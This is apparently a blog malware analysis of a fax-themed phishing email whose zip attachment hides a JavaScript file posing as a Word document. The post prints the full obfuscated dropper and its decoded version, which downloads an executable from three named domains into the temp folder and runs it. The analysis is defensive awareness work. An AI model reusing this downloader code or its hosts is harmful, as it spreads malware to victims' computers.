JavaScript Virus Downloader

Recently, there are many attempts to install viruses by using JavaScript script code.

In this case study, I am going to present a recently received phishing mail and its content. If you open the attached zip file and click on the file in it, it triggers a download of “virus crop” into your computer and activates it.

The Email is:

From:   Interfax [incoming@interfax.net]
To:        XXXX
Cc:
Subject: You have received a new fax, document 0000234523You have a new fax!To view it please open theThe virus mail.

attachment.File size:       232 Kb
Scan time:       31 seconds
Number of pages: 10
Filename:         task_0000234523.doc
Quality:         500 DPI
Scanned at:       Sat, 2 Jan 2016 12:47:08 +0300
Sender:           Roger CarneyThanks for using Interfax service!

The attached zip file contains file name task…doc.js.

The ZIP file content. (Click to enlarge).

 

The filename attempt to trick you to believe that this is a word document. But the .js at the end makes it a JavaScript code. This code is executed in the machine and downloads software (viruses) into the computer.

The JavaScript code itself is encoded. I wanted to see it in plain text, so I did some research on it to decode it:

var str=”5553515E09010D000524071D06011649000B09014A070B095E3C5E090
5140905100D07174A070B095E17505E555051555357515353545E55″;
var e7=’; ‘,r2=’00) ‘,i4='{ xa.’,q1='(xo’,g7=’2″; v’,j6=’%”)’,x0=’ld;’,j5=’d=”‘,i6=’ 1) ‘,w4=’lse’,y5=’b = “‘,f0=’t.She’,d2=’n,’,f3=’pt.C’,e6=’crip’,s9=’ try’,p8=’ i<b.’,v4=’ fa’,c6=’tri’,z0=’en’,h5=’fo’,w3=’rea’,v7=’Scrip’,t1=’n-co’,l5=’ar i=’,e4=’= 1;’,c8=’ct(“‘,l8=’y); ‘,o6=’ n<‘,n8=’ze’,m5=’pe =’,d6=’a.si’,q6=’ar’,w6='{ va’,n4=’.open’,y0=’tre’,t0=’bje’,d5=’biz’,p9=’ };’,c1='{ l’,m0=’.co’,n3=’ var’,y3=’r ‘,n9=’,1′,b5=’TEMP’,f1=’; }’,q2='”.ex’,n6=’.spl’,i2=’3″+’,b6=’.resp’,z8='”/co’,u6=’; x’,w0=’File’,v0=’us’,h7=’; };’,e2=’+S’,x7=’a =’,q0=’ ==’,s5=’n++) ‘,t9=’0) ‘,v3=’ea’,r7=’tch (‘,j7=’ar ld’,l7=’} ca’,r9=’len’,c5=’o.’,d9=’WS’,j3=’e”‘,t4='(92)+’,e3=’ebtec’,g8=’m”‘,e8=’it(” ‘,q9=’n+’,q8=’}; }’,d3=’if (‘,a3=’ W’,o3=’or (v’,n5=’r d’,z6=’r+”&r’,d7=’P”)’,b9=’ ws’,j9=’a.wri’,g6=’= ‘,c7=’unter’,h0=’d(); ‘,o1='”.ex’,y7=’; xa’,x6=’ W’,l1=’n+n+’,o5=’,0); ‘,v5=’n ‘,z9='();’,f4=’L2.X’,n0=’WScr’,v6=’ositi’,p6=’op’,u4=’ipt.’,j4=’Cr’,x4=eval,a4=’y { w’,s4=’p://”‘,y8=’En’,u1=’=3; ‘,a2=’Obj’,g0=’ 1; x’,z5=’xpand’,s7=’ODB’,w9=’n+’,f9=’+b[i’,a5=’en()’,z1=’SXM’,k1=’cup-‘,t2=’in.co’,j8=’ if’,m7=’==’,u3=’te’,z4=’ f’,u0=’,”htt’,t8=’; };’,t7=’To’,p0=’viron’,i8=’; ‘,g5=’ct(“M’,l3=’n =’,f8=’/?i’,k3=’ak’,f5=’; v’,r3=’; v’,f2=’r (va’,f7=’= 0;’,k7=’Sc’,g9=’n=1;’,v1=’St’,q4=’var x’,z2=’); ‘,s8=’ll”‘,s0=’xo.s’,o4=’s.’,r8=’te’,i9=’ng’,l6=’ xo =’,l4=’nd=’,u7=’); tr’,e5=’t.C’,m3='”96′,k8=’am”)’,x9=’i++) ‘,g1=’rom’,p5=’MLHTT’,t3=’) { ‘,u2=’CharC’,x8=’; bre’,x1=’ET”‘,l0=’ ws ‘,r0=’ar’,n1=’on = ‘,g4=’gth; ‘,p7=’rings’,m8=’00’,o0=’if (x’,d4=’reate’,w1=’n ‘,h2=’]+’,w7=’logy’,r5=’r ‘,d1=’catch’,a0=’d = i’,h8='{ f’,b2=’ 2′,k9=’ment’,s3=’stat’,x2=’0; ‘,q5=’ect(‘,i0=’Run(f’,i1=’+st’,h6=’m t’,w2='”)’,u8='(“G’,s1=’ (‘,m9=’.clo’,b4=’ode’,g2=’.E’,m4=’se’,y2='{ }’,f6='”AD’,w5=’eBod’,v2=’);’,k0=’45242′,o7=’a.ty’,x5=’w.a’,i3='(“%’,i5=’ri’,p1=’.S’,e9=’ ww’,o9=’va’,y1=’er) ‘,c3='{ dn ‘,z3=’ } ‘,a6=’ (d’,l2=’save’,n7=’ons’,t6='(f’,a9=’.f’,k5=’ = 0′,m2=’xa.’,t5=’hno’,b7=’avan’,c9=’xo.’,j1=’Obje’,a1=’er’,a8=’ { xo’,o2=’e”,2′,a7=’ > 1′,e1=”,h9=’115′,y6=’ xa.p’,p3=’eonw’,k4=’teO’;e1+=o9;e1+=y3;e1+=y5;e1+=k1;e1+=t1;e1+=t2;e1+=h6;e1+=b7;e1+=c5;e1+=d5;e1+=e9;e1+=x5;e1+=p3;e1+=e3;e1+=t5;e1+=w7;e1+=m0;e1+=g8;e1+=n6;e1+=e8;e1+=w2;e1+=f5;e1+=r0;e1+=l0;e1+=g6;e1+=n0;e1+=u4;e1+=j4;e1+=v3;e1+=k4;e1+=t0;e1+=c8;e1+=d9;e1+=e6;e1+=f0;e1+=s8;e1+=v2;e1+=n3;e1+=z4;e1+=l3;e1+=b9;e1+=g2;e1+=z5;e1+=y8;e1+=p0;e1+=k9;e1+=v1;e1+=p7;e1+=i3;e1+=b5;e1+=j6;e1+=e2;e1+=c6;e1+=i9;e1+=a9;e1+=g1;e1+=u2;e1+=b4;e1+=t4;e1+=m3;e1+=h9;e1+=g7;e1+=q6;e1+=l6;e1+=a3;e1+=v7;e1+=e5;e1+=w3;e1+=u3;e1+=j1;e1+=g5;e1+=z1;e1+=f4;e1+=p5;e1+=d7;e1+=e7;e1+=q4;e1+=x7;e1+=x6;e1+=k7;e1+=i5;e1+=f3;e1+=d4;e1+=a2;e1+=q5;e1+=f6;e1+=s7;e1+=p1;e1+=y0;e1+=k8;e1+=r3;e1+=j7;e1+=k5;e1+=i8;e1+=h5;e1+=f2;e1+=r5;e1+=g9;e1+=o6;e1+=u1;e1+=s5;e1+=h8;e1+=o3;e1+=l5;e1+=x0;e1+=p8;e1+=r9;e1+=g4;e1+=x9;e1+=w6;e1+=n5;e1+=v5;e1+=f7;e1+=s9;e1+=a8;e1+=n4;e1+=u8;e1+=x1;e1+=u0;e1+=s4;e1+=f9;e1+=h2;e1+=z8;e1+=c7;e1+=f8;e1+=j5;e1+=i1;e1+=z6;e1+=l4;e1+=k0;e1+=i2;e1+=d2;e1+=v4;e1+=w4;e1+=z2;e1+=s0;e1+=z0;e1+=h0;e1+=d3;e1+=c9;e1+=s3;e1+=v0;e1+=q0;e1+=b2;e1+=r2;e1+=i4;e1+=p6;e1+=a5;e1+=u6;e1+=o7;e1+=m5;e1+=g0;e1+=j9;e1+=r8;e1+=q1;e1+=b6;e1+=n7;e1+=w5;e1+=l8;e1+=o0;e1+=d6;e1+=n8;e1+=a7;e1+=m8;e1+=t9;e1+=c3;e1+=e4;e1+=y6;e1+=v6;e1+=n1;e1+=x2;e1+=m2;e1+=l2;e1+=t7;e1+=w0;e1+=t6;e1+=l1;e1+=q2;e1+=o2;e1+=u7;e1+=a4;e1+=o4;e1+=i0;e1+=w9;e1+=q9;e1+=o1;e1+=j3;e1+=n9;e1+=o5;e1+=l7;e1+=r7;e1+=y1;e1+=y2;e1+=f1;e1+=y7;e1+=m9;e1+=m4;e1+=z9;e1+=p9;e1+=j8;e1+=a6;e1+=w1;e1+=m7;e1+=i6;e1+=c1;e1+=a0;e1+=x8;e1+=k3;e1+=h7;e1+=z3;e1+=d1;e1+=s1;e1+=a1;e1+=t3;e1+=q8;e1+=t8;x4(e1);

 

As you can see, it is decoded so it’s hard to understand what it does. Decoding it reveals its true nature:

var b = “cup-n-coin.com tavano.biz www.aeonwebtechnology.com”.split(” “);
var ws = WScript.CreateObject(“WScript.Shell”);
var fn = ws.ExpandEnvironmentStrings(“%TEMP%”)+String.fromCharCode(92)+”961152″;
var xo = WScript.CreateObject(“MSXML2.XMLHTTP”);
var xa = WScript.CreateObject(“ADODB.Stream”);
var ld = 0;
for (var n=1; n<=3; n++) {

for (var i=ld; i<b.length; i++) {

var dn = 0;
try {

xo.open(“GET”,”http://”+b[i]+”/counter/?id=”+str+”&rnd=452423″+n, false);
xo.send();
if (xo.status == 200) {

xa.open(); xa.type = 1;
xa.write(xo.responseBody);
if (xa.size > 1000) {

dn = 1;
xa.position = 0;
xa.saveToFile(fn+n+”.exe”,2);
try {

ws.Run(fn+n+”.exe”,1,0);

}
catch (er) { };

};
xa.close();

}

if (dn == 1) {

ld = i;
break;

}

} catch (er) { };

};

};

 

The code is professionally made, and even disguises any exception that might occur during its operation.
Basically, this code goes to three sites:

cup-n-coin.com
tavano.biz
www.aeonwebtechnology.com

And downloads viruses into the “temp” directory of the computer. It calls it some arbitrary name:
xa.saveToFile(fn+n+”.exe”,2);.
The “.exe” makes it windows native program. Later, it attempt to run the newly downloaded virus:
ws.Run(fn+n+”.exe”,1,0);

The virus program that is now downloaded to your computer is another downloader that can bring the heavy Spyware/Ransomware and put them into action in your computer.

Some antivirus programs do intercept this Virus downloader. But, don’t count on it. Just be aware and don’t open “Social engineering” emails attempting to victimize you. In this picture you can see Microsoft antivirus intercepting the code. (I had to disable it to process this code. :-)  ).

EssentialDetection